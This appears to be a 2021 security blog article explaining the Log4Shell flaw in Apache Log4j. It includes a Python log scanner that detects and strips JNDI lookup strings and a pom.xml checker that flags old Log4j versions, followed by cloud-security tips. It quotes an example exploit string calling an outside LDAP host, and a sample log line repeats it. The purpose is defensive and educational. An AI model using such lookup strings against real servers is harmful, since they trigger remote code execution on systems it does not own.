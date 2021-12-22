



A vulnerability in Apache Log4j, now known as Log4Shell, has caught security teams off guard and swept across the Internet.

A seemingly harmless logging tool has been used by hackers to take control of vulnerable applications. Apache has rated this vulnerability as “serious” and has released a patch to contain the potential damage. Log4Shell also carries the highest possible CVSS score, 10. In other words, this is a serious flaw in code that sits at the foundation of a huge number of web applications, and it is considered both extremely widespread and extremely dangerous.

The exploit works by trading on the benign reputation of logs. Logs are not normally thought of as an attack vector, which is why this attack has surprised so many security organizations. In this case, the Log4Shell vulnerability lives in the lookup plugin, which gives Java applications a way to retrieve objects stored in DNS or LDAP directories. Plugins let the logger do more than “just” logging, and that is the heart of the problem: it lets attackers turn the logging tool against your application.

The JNDI lookup plugin contains the Log4Shell vulnerability. Its input query is normally expected to hold only an object name. If a URL is inserted in place of the object name, for example ${jndi:ldap://website.com/rce}, Log4j connects over JNDI to the specified server and fetches a Java object from it. The result is remote code execution on the server that is doing the logging.
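A defender’s first question after reading the above is whether such lookup strings have reached the application’s logs at all. The following Python script is an added example, not code from the original article or from the Log4j project: it scans log lines for the ${jndi:<scheme>://<host>/...} syntax described above, reports the directory protocol and the host the vulnerable logger would have contacted, and neutralizes the string before the line is forwarded to any other component that might itself evaluate Log4j lookups. The access-log lines are constructed for the example; only the lookup string itself comes from the text.

```python
import re
from dataclasses import dataclass

# Pattern for the lookup syntax described above: ${jndi:<scheme>://<host>/<object>}.
# Whitespace is tolerated around the separators so that stray spacing does not defeat the match.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<host>[^/\s}]+)(?P<path>[^}]*)\}",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line_no: int
    scheme: str   # directory protocol the lookup names, e.g. ldap
    host: str     # server the vulnerable logger would connect to
    raw: str      # the matched lookup text as it appeared in the log


def scan_log_lines(lines):
    """Return one Finding per JNDI lookup string found in the given log lines."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            findings.append(Finding(line_no, m.group("scheme").lower(),
                                    m.group("host"), m.group(0)))
    return findings


def neutralize(line):
    """Replace lookup strings with an inert marker so the line can be forwarded to a
    SIEM or another logger without carrying an evaluable lookup along with it."""
    return JNDI_LOOKUP.sub("[JNDI-LOOKUP-REMOVED]", line)


# Constructed sample access-log lines (not real traffic). The second line carries the
# lookup string from the text above in its User-Agent field; the third merely mentions
# "jndi" in a path and must not be reported.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [22/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://website.com/rce}"',
    '10.0.0.9 - - [22/Dec/2021:10:00:03 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 404 "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup to {f.host}: {f.raw}")
    print(neutralize(SAMPLE_LOG[1]))
```

The scanner only recognizes the plain syntax the article shows; in a production pipeline it would be one signal among several, and the real fix remains upgrading Log4j so that the logger never evaluates the lookup in the first place.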

Because this logging tool is everywhere, hackers have endless opportunities to exploit it.

Securing cloud applications has always been a challenge. Not only does the number of cloud applications keep growing, but the applications themselves evolve and their usage changes over time. Yet we expect them to stay secure as they grow, and we expect security teams to keep pace with them.

That is the problem. DevOps teams are innovating faster than ever, so protection has to keep up as the application keeps changing. To defend against this attack and the ones that follow, organizations must stay preemptive, coordinate their cloud application security strategy, scale with cloud adoption, and head off the next zero-day attack. There are several ways to get there.

Tip 1: Build automation into your cloud security process. As a general rule, cloud tools cannot keep up with the development team without automation, and cloud security tools are no exception. Without it, they cannot stay ahead, anticipate the next attack, or find the malicious actor. As the application evolves, new components need to be protected as quickly as possible.

Tip 2: Remove human intervention wherever possible. Human oversight matters for interpreting data and spotting macro trends, but no human administrator can monitor and evaluate every microservice and every piece of code running inside a cloud application. When security depends on manual management, application security suffers while the team scrambles to patch, as the Log4j exploit showed. Current technology offers the chance to harness machine learning and artificial intelligence so that security stays relevant even as the application evolves faster than anyone imagined. It’s time to make the most of that opportunity.

Tip 3: Take a zero-trust approach to security. Against zero-day attacks like the Log4j exploit, a zero-trust approach prevents the attack rather than leaving the team to respond and fix it afterwards. Use security controls that act preventively, so there is no need to go back and patch potential vulnerabilities after the security team discovers them.

Tip 4: Assume nothing! When your DevOps team builds or improves an application, make sure that all Infrastructure-as-Code and other third-party code complies with your organization’s security policy and is protected in some way. Log4Shell is a good example of how inventive hackers can be.
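One concrete way to check third-party code against a policy, as Tip 4 asks, is to have the build pipeline refuse any dependency manifest that still pins a Log4j version below the floor your security team has set. The Python script below is an added example and is not code from the article or from Apache: it parses a Maven pom.xml, resolves ${...} property references that Maven projects commonly use for versions, and reports every log4j-core dependency that is either below the floor or not pinned at all. The pom.xml content and its version numbers are constructed for the example, and the policy floor MIN_SAFE_LOG4J is an assumption to be replaced with whatever the current Apache advisory names.

```python
import xml.etree.ElementTree as ET

POM_NS = "{http://maven.apache.org/POM/4.0.0}"
LOG4J_GROUP = "org.apache.logging.log4j"
LOG4J_CORE = "log4j-core"

# Assumption: the policy floor is taken from the Apache Log4j advisory current at
# review time. Treat this value as a placeholder and set it from that advisory.
MIN_SAFE_LOG4J = (2, 17, 0)


def parse_version(text):
    """Turn '2.14.1' (or '2.14.1-rc1') into a comparable tuple of three integers."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def pom_properties(root):
    """Collect <properties> so that ${name} references in <version> can be resolved."""
    props = {}
    props_el = root.find(POM_NS + "properties")
    if props_el is not None:
        for child in props_el:
            props[child.tag.replace(POM_NS, "")] = (child.text or "").strip()
    return props


def resolve(value, props):
    """Resolve a literal version or a ${property} reference; None if it cannot be resolved."""
    if value is None:
        return None
    value = value.strip()
    if value.startswith("${") and value.endswith("}"):
        return props.get(value[2:-1])
    return value or None


def check_pom(pom_xml, min_safe=MIN_SAFE_LOG4J):
    """Return a list of policy violations for log4j-core dependencies in a pom.xml."""
    root = ET.fromstring(pom_xml)
    props = pom_properties(root)
    violations = []
    for dep in root.iter(POM_NS + "dependency"):
        group = dep.findtext(POM_NS + "groupId")
        artifact = dep.findtext(POM_NS + "artifactId")
        if group != LOG4J_GROUP or artifact != LOG4J_CORE:
            continue
        version = resolve(dep.findtext(POM_NS + "version"), props)
        if version is None:
            # Unpinned or inherited versions cannot be verified here, so they fail the check.
            violations.append(f"{artifact}: version not declared in this pom, cannot verify")
        elif parse_version(version) < min_safe:
            floor = ".".join(str(n) for n in min_safe)
            violations.append(f"{artifact} {version} is below the policy floor {floor}")
    return violations


# Constructed sample pom.xml (not from any real project). The Log4j version is held in a
# property, which is the common layout in real Maven builds.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>example</groupId>
  <artifactId>demo</artifactId>
  <version>1.0</version>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>${log4j.version}</version>
    </dependency>
  </dependencies>
</project>"""

if __name__ == "__main__":
    for violation in check_pom(SAMPLE_POM):
        print("POLICY VIOLATION:", violation)
```

Wiring a check like this into the pipeline that builds every service is what turns a written policy into something that actually stops a vulnerable dependency from reaching production; the same idea applies to Gradle files, container images and Infrastructure-as-Code templates, each with its own parser.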

The cloud has given organizations the opportunity to innovate and succeed, but it’s important to remember that malicious actors are taking advantage of the very same speed and scale. The Log4j exploit proves it. Organizations do monitor continuously and raise warnings as needed, but that is remediation, and remediation is not as effective as prevention or preemptive measures. That’s why AI is an important component of staying secure in today’s threat landscape.

To stay ahead of criminals, organizations need to make sure they are applying hands-off, automated, zero-trust security across the whole cloud environment and the whole application lifecycle.

